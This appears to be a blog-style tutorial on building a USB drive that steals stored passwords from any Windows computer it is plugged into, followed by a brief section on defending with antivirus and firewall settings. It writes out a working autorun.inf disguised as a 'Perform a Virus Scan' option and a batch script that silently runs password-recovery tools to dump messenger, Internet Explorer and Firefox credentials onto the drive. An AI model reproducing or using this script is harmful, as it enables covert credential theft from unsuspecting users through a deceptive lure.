I’ll describe a procedure to obtain all passwords stored on a computer onto a Pen drive/ Flash Drive and later I’ll teach you how to protect yourself from such an attack.

   I’ll work in a folder called “Kougon Super Drive” But you can use any folder of your choice. You could also save all the files directly onto a pen drive

1. Open a Notepad file and type the following piece of code

[autorun]
open= scan.bat
ACTION= Perform a Virus Scan

Save the file as “autorun.inf”

2.  Now we will need a few programs to rip passwords off Windows. A company called NIR soft has been making free software's that can do this using a clever piece of code. By using the link you can access all their recovery software's. I’ll use only a few of them

• Messenger Pass (mspass) : This will recover all passwords from all Messengers.
• IE pass view (iepv) : Recover passwords saved on Internet Explorer
• Password Fox (passwordFox): Recovers all Firefox passwords.

Extract all the Executable files after you download the above softwares and place them in a folder called “ passes “. This folder must be inside the current working Folder.

Now all these utilities can be called using Command line parameters. We’ll now write a batch file to call them silently and save the resulting password onto a series of HTML files

3. Open Notepad and type the following piece of code 

@echo off
set number=1

:looper
if exist "passes/mspass%number%.html" set /a number=%number%+1
if not exist "passes/mspass%number%.html" goto savepasses
goto looper

:savepasses

start passes/mspass.exe /shtml passes/mspass%number%.html

start passes/iepv.exe /shtml passes/iepv%number%.html

start passes/passwordfox.exe /shtml passes/passwordfox%number%.html

Save this file as “scan.bat” . Save it in the same location as autorun.inf and one level above the passes folder.

4. Copy all these files into a Pen Drive

5.  Every time this disk is inserted into a computer you will get  an option to “scan the computer”. Run the scan and lo! all the passwords will be dumped in neat HTML files in the passes folder. The filenames will be automatically incremented after each iteration so you don’t have to bother changing the file names.

DEFENCE from this Exploit

You can save yourself from this attack by using 2 free softwares. I recommend Avira’s Anitivir and C.O.M.O.D.O Personal Firewall. You may have to make small changes in the configuration of antivir.

Antivir is a free Anti-virus software produced by Avira. It has one of the best detection rates and Virus Removal efficiency. {Verify it online through Wikipedia}.

open Avira and click on “configuration”

Check the  “Expert Mode” Radio button. Now click on “General” and click on “select all” for threat categories and hit apply. Just make sure you end up with the following window

 

That’s it the anti-virus software will now detect all the password sniffing software's and will give you an option to prevent them from being executed.

 

In C.O.M.O.D.O Firewall ; just enable the Defense+ option. and keep it in the default “Safe PC mode”. This will protect your computer from any programs that wish to access memory locations that are used to store passwords.

This will Protect your computer from Prying eyes.